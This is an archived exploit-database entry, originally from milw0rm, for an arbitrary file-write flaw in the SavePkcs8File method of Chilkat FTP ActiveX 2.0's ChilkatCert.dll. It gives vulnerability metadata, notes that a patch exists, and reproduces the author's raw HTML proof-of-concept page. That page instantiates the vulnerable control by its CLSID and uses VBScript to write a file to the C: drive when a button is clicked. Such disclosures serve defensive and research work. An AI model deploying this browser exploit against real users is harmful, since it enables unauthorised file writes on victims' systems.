Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

vendor:

Chilkat FTP ActiveX

by:

darkl0rd

7.5

CVSS

HIGH

Insecure Method

264

CWE

Product Name: Chilkat FTP ActiveX

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: a:chilkatsoft:chilkat_ftp_activex

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP2

2008

Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

A vulnerability exists in Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) which allows an attacker to write arbitrary files to the system. This is due to the insecure use of the SavePkcs8File method which allows an attacker to write arbitrary files to the system.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<body bgcolor="#000000">

<div align="center">

<pre><code><span style="font: 10pt verdana;"><font color="#00FF00">=======================================================================
</font></div><center>
 <h1 id="product"><font color="#00FF00" size="2">Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method</font><font face="Verdana" color="#00FF00"><br><br><font size="2"> Web site : <a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a></font></font><font color="#00FF00"><br></font><font face="Verdana" color="#00FF00"><br><font size="2">=======================================================================</font></font></span><font color="#00FF00"><br><span style="font-style:normal; font-variant:normal; font-size:10pt; font-family:Verdana; font-weight:700">Author: darkl0rd<br> <br>E-mail: l_l_darkl0rd_l_l@yahoo.com</span><br><span style="font-style:normal; font-variant:normal; font-weight:normal; font-size:10pt; font-family:Verdana"><br> Tested on Windows XP Professional SP2 , with Internet Explorer 6</span></font></h1><p id="product"><font color="#FF0000">Class privateKey</font><font color="#00FF00"><br></font><font color="#FF0000">GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}<br>Number of Interfaces: 1<br>Default Interface: IPrivateKey</font></p><p id="product"><font color="#FF0000">SavePkcs8File</font></p></center>

<div align="center"><font color="#00FF00"><object classid='clsid:A934AEE3-8896-485F-8A55-ACF2A87BD010' id='over' align="left" width="1" height="2"></object>
<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SavePkcs8File mystr
   MyMsg = MsgBox(" Done ! ")
 End Sub
</script>
</span></span>

</font></code></div></p>
</pre>

# milw0rm.com [2008-01-31]